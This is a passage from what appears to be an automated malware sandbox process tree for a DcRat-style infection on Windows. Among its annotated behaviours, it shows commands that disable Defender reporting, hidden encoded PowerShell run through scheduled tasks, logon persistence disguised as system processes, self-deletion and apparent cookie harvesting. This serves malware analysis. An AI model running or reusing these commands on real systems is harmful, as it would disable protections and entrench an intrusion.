                                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:2080
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:5624
                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:3716
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /CREATE /TN "gneIVspRo" /SC once /ST 00:50:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • DcRat
                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                      PID:6076
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                      schtasks /run /I /tn "gneIVspRo"
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                        PID:5808
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "gneIVspRo"
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                          • DcRat
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:4956
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:3988
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:4660
                                                                                                                                                                                                                                        • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                                          choice /C Y /N /D Y /T 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        PID:3444
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:3852
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
                                                                                                                                                                                                                                      arnatic_7.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:2940
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:3192
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:3868
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exe
                                                                                                                                                                                                                                      arnatic_5.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:3700
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:2672
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exe
                                                                                                                                                                                                                                      arnatic_4.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                      PID:1900
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:776
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:2252
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:2776
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exe
                                                                                                                                                                                                                                      arnatic_3.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:2072
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                                                                                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        PID:1060
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 600
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          PID:2084
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:648
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exe
                                                                                                                                                                                                                                      arnatic_1.exe
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                      PID:3528
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 1032
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:3000
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1060 -ip 1060
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3112
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3528 -ip 3528
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3988
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4488
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\runonce\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4548
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comuid\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4520
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\dpnathlp\winlogon.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4568
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "5RLR8rS_aMkp6xiTBY96V6aV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\These\5RLR8rS_aMkp6xiTBY96V6aV.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:4592
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1368 -ip 1368
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4644
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\uefifces\ezokegez.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\uefifces\ezokegez.exe /d"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1420
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                        svchost.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2548
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 516
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          PID:4656
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4252 -ip 4252
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:1176
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1420 -ip 1420
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:4236
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4788
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\docprop\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4712
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Documents and Settings\WaaSMedicAgent.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4948
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\unimdmat\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4904
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\WMADMOE\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:5000
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "ETuSLYkVQqOjTT_usPKsVG0_" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Mh9GBYaC5IGIHnRPtOgGO9qd\ETuSLYkVQqOjTT_usPKsVG0_.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4984
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "arnatic_7" /sc ONLOGON /tr "'C:\Documents and Settings\arnatic_7.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:5016
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Uev.Office2013CustomActions\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:4516
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\odt\services.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • DcRat
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                            PID:5104
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1368 -ip 1368
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:1832
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5044 -ip 5044
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5004 -ip 5004
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4944
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4148 -ip 4148
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5072
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1368 -ip 1368
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5016
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4900 -ip 4900
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3848
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 4148
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:5188
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 4148
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5364
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 4148
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5504
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5044 -ip 5044
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5780
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5824 -ip 5824
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5964
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4900 -ip 4900
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:6024
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1368 -ip 1368
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5004 -ip 5004
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:3852
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4148 -ip 4148
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5456
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1332 -ip 1332
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:1612
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1368 -ip 1368
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3504
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4148 -ip 4148
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5964
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4148 -ip 4148
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:3624
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1332 -ip 1332
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5928
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4148 -ip 4148
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3184
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5884 -ip 5884
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:4032
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:2656
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:2040
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AF15.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AF15.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5308
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\AFC2.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\AFC2.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                              PID:1968
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AFC2.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\AFC2.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:6060
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3540
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:2984
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:4824
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe j6 /site_id 525403 /S
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:4592
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
